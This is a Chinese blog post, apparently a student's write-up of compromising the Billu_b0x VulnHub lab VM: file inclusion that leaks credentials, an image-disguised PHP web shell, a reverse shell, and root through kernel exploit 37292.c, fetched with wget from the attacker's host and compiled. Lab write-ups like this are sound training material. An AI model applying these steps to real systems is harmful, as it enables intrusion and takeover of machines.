Billu_b0x靶场渗透测试

已于 2023-11-05 17:22:34 修改
阅读量139 收藏 4
点赞数
文章标签: 网络安全 linux 安全 服务器 web安全
于 2023-11-05 17:21:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41567985/article/details/134232239
版权

项目概述

渗透测试目的

渗透测试范围

渗透测试时间

渗透测试环境

渗透测试人员

渗透测试方法

渗透测试流程

渗透测试方法与内容

渗透测试结果汇总

拿到系统权限-

本次渗透测试范围为本地,具体如下:

1-1:渗透测试对象

序号

系统名称

网站地址

内外网

1

     Billu_b0x

http://192.168.22.136

内网

2023年11月5日 下午2:00 – 下午16:00

在本地开展内网的vmware虚拟机中渗透测试。

TYR2

  • 信息收集
  • 主机存活扫描和端口扫描

136 并且开启了22端口和80端口

  • 目录扫描
  • http://192.168.22.136

  • 深入扫描

test.php页面说少了fiile,猜测这里具有文件包含

  • 漏洞验证与利用
  • 文件包含漏洞利用
  • 试试文件包含

发现枚举file=...没有返回消息

转换成POST试试

发现下载了passwd文件

  • 那这里就证实了存在文件包含漏洞

前面扫描有个phpmyadmin页面,那我们下载他的配置文件config.inc.php

            不知道怎么的,使用hackbar始终下载的是passwd

            这里换成命令行试试

下载成功,并且发现用户名和密码root/toor

  • 登录phpmyadmin试试

    发现登录不上

  •     试试ssh

登录成功

  • 读取一下c.php中的源码

        

发现phpmyadmin的账号密码

登录账号密码

    从auth表中发现一个新的账户密码

        

  • 试试主页面的登录

        

这里有文件上传--试试

        

上传1.php---提示只能上传png,jpg gif文件

     only png,jpg and gif file are allowed

  • 上传图片马能够上传成功

但是无法读取

要利用文件包含

  • 尝试使用test.php页面的文件包含,发现不可靠,能读取,但是无法利用
  • 尝试看看panel.php页面的源码

        

发现也具有文件包含

使用bp抓包--修改成POST方式进行命令操作试试

    发现成功读取到了

        

  • 使用反弹shell试试

始终反弹不成功,按照网上的方法也都试了试,还是不成功,不是很明白

....

....

......

.............

.two hours later。。。。

  • 试了很多种方法,发现我最初的GIF89a图片马的方法可行,不是很清楚为什么使用copy 1.jpg/b+2.php 3.jpg的方式不可以

        

  • 来试试反弹shell

    不成功

        

  • 看看用户是www-data,应该是没有权限

使用了很多提权命令都不是很行,也在里面使用了wget发现还是不行,后面才查到没有权限需要去/tmp目录下

确实啊,tmp目录本来就容易被忽视,777的权限,这个应该要好好的完善一下权限才行

        

  • 提权吧

先反弹shell进入一个方便操作的界面:

上传一个php反弹shell'文件,然后以GIF89a开头就可以绕过了

把限免load改成上传的php文件改成jpg文件之后的名字-send-并且反弹成功

        

  • 然后查看内核为Linux 3.13.0
  • searchsploit "Linux 3.13.0"

        

  • 找到对应的提桥脚本 37292.c
  • 然后使用find / -name "37292.c"找到脚本位置并使用cp命令复制一份到桌面-开启临时服务器
  • wget下载

        

  • 但是权限不够

在linux下,所有用户对tmp目录都有可写权限

cd /tmp

    wget http://192.168.22.129/37292.c

    成功下载

  • 编译c文件

    gcc 37292.c -o exp

    运行exp文件

    成功提权root

        

  • 渗透测试结果汇总

总结一下今天的打靶,这个靶场有很多漏洞可以利用,但是我也只是利用了一两个,中间反弹shell那里花了挺多时间的,但是也有提升,让我学到了很多种反弹shell的方法!

TYR2
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
红队打靶:billu_b0x打靶思路详解(vulnhub)
Bossfrank的博客
07-17 1945
本文是vulhub靶机bulli_b0x的详细打靶过程,涉及到的知识点包括SQL注入、文件包含漏洞利用、php代码审计、图片马的制作等。靶机不难,但细节很多,信息搜集是关键!细节包括使用POST的方法寻找文件包含的漏洞参数、读取index.php的源码确定sql注入的逻辑、上传图片马、找到触发图片马执行的路径、反弹shell的指令要进行url编码、敏感文件搜索碰撞数据库密码与ssh账号密码等等。
Vulnhub靶机笔记01——Billu_b0x
2301_76329510的博客
04-16 1271
test。
CTF综合靶场渗透系列-Billu_b0x
lza20001103的博客
10-11 3744
CTF综合靶场渗透系列-Billu_b0x
Vulnhub靶机:Billu_b0x
最新发布
qq_48904485的博客
03-06 694
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机:Billu_b0x(192.168.56.107)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/billu/Billu_b0x.zip。
billu_b0x靶场通关
tpaer的博客
03-03 714
billu_box靶场通关
billu-b0x靶场渗透
11-14
billu-b0x靶场渗透
靶机练习之Billu_b0x
10-04
通过该靶场,能够初步了解web渗透的基本流程。小白在了解了web各种漏洞原理,之后,可以练习一下该靶场靶场做法很多。我也是一个小白,来这里记录一下学习的过程,不喜勿喷!!!感谢!!!
VMware-ovftool-4.4.0-15722219-win.x86_64.rar
05-03
《VMware ovftool在虚拟化管理中的应用与问题解析》 VMware ovftool,全称为OVF Tool,是一款由VMware公司推出的强大工具,主要用于处理OVF(Open Virtualization Format)和OVA(OVF Archive)文件,是虚拟化环境...
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
Vulnhub-CTF-Writeups ...比卢:B0x 莫里亚1.1 Lazysys管理员 斗牛犬 BTRSys:DV 2.1 BTRSys 1 难以置信地容易 狄娜 Born2Root G0rmint 基本渗透 BSides Vancuver:2018年 Toppo:1 Billu Box 2 基
Billu_b0x渗透总结
qq_45300786的博客
06-05 4632
Billu_b0x这个靶机也是断断续续的才做完,途中遇到了很多不懂的,但是这也表明进步的空间很大,这个靶机很适合我们这种初级的学习者,其中不乏趣味性,也有点难度,但总体思路是清晰的,有兴趣的同学不妨试试。 1.主机发现 arp-scan -l 或者 nmap -sn 192.168.223.0/24 -oG - 2.端口扫描 nmap -sS 192.168.223.132 或者 nmap -sS -A -Pn -p- -n 192.168.223.132 或者 nmap 192.168.223.0/24
Billu_b0x
PromisingQ
04-01 3427
完整过程 开启虚拟机用kali扫了半天没扫到,还以为环境有问题…最后发现是网络模式设置的仅主机…改成net以后,nmap -sP 192.168.144.1/24 nmap -p 1-655535 -sV 192.168.144.144 访问80端口 很明显登录框,尝试SQL注入,直接上最高等级,不过还是未果sqlmap -r post.txt --level=5 --risk=3 然后就扫一下目录呗, (字典太大,而且有重复,扫了一个小时,需要优化…) 经过筛选,发现5个可疑的地址: http://
VulnHub靶场渗透实战11-Billu_b0x
随心所欲不逾矩
07-31 2184
VulnHub靶场渗透实战11-Billu_b0x
vulnhub靶场Billu_b0x
kukudeshuo的博客
07-21 699
vulnhub靶场Billu_b0x 环境准备 靶机下载地址:https://www.vulnhub.com/entry/billu-b0x,188/ 攻击机:kali(192.168.58.130) 靶机:Billu_b0x(192.168.58.159) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 ...
靶场渗透(一)——billu_b0x渗透
Ramona的博客
07-29 1090
测试环境 靶机:billu_b0x 打开虚拟机后设为nat模式 攻击机:kali 信息收集 • 获取靶机ip kali: nmap -sP 192.168.111.1/24(ip段根据实际情况自己更改) 获取到的信息:ip192.168.111.128 • 扫描开启的端口 kali: nmap -p1-65535 -A 192.168.111.128 获取到的信息:开放端口22...
一次Billu_b0x渗透学习
nini_boom的博客
10-16 1315
一次Billu_b0x渗透学习 这次的Billu_b0x靶场应该说是学习经验,按照大神的流程走了一遍,中间各种扫盲,和学习思路,现在把整体的思路和过程梳理一下。 一、发现IP 虚拟机打开,按照规则所说,NAT模式,没有发现IP 于是ifconfig,找到vmnet8的C段,这里就是虚拟机存在的网段。 nmap -sP 172.16.230.1/24 nmap -sP 是扫描这个C段对pin...
bilu靶场渗透测试
weixin_43960066的博客
10-24 1524
bilu靶场渗透测试
【VulnHub】billu_b0x靶场复盘
redwand的博客
01-21 4557
此题目主要训练三方面要点,一是post方法下的文件包含,二是post方法下的getshell,三是[CVE-2015-1328]的利用。很多细节不错,值得入手一练。
渗透测试】通过实战教你通关Billu_b0x靶机
Monsterlz123的博客
07-10 1437
渗透测试】通过实战教你通关Billu_b0x靶机 Hello,各位小伙伴大家好 这里是你们的小编Monster~ 话说提升技术很好的一个方法,就是去通关各种靶机 上周通关了一个靶机Billu_b0x,从中学到了很多东西,因此赶紧记录下来。 大家来跟我一起看看吧~ 实验拓扑: 靶机下载链接:https://download.vulnhub.com/billu/ 一、信息收集 1、IP与端...
[ 转]渗透测试实战-billu b0x2靶机入侵
zgy956645239的博客
03-01 817
billu b0x2靶机 老规矩 nmap 开路 通过探测可以看到该靶机一共开放了5个端口,我们还是把目光放在80端口上 访问如图: 看到底下 该网站使用了 “Drupal”框架搭建,前几个月该框架曝光过一个高危漏洞,根据这些靶机的惯用尿性,应该是存在该漏洞的。通过MSF来搜索该漏洞,如图: 发现有漏洞,调用模块输入ip和payload,如图: 成功拿下shell。。。。 如图:...
开源漏洞靶场环境-Vulhhub
煮酒闲谈
12-22 8622
0x 前言分享一个开源漏洞靶场环境Vulhhub Vulhub - Some Docker-Compose files for vulnerabilities environmentVulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。0x1 Installation项目地址: https://github.com/Cherishao/

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值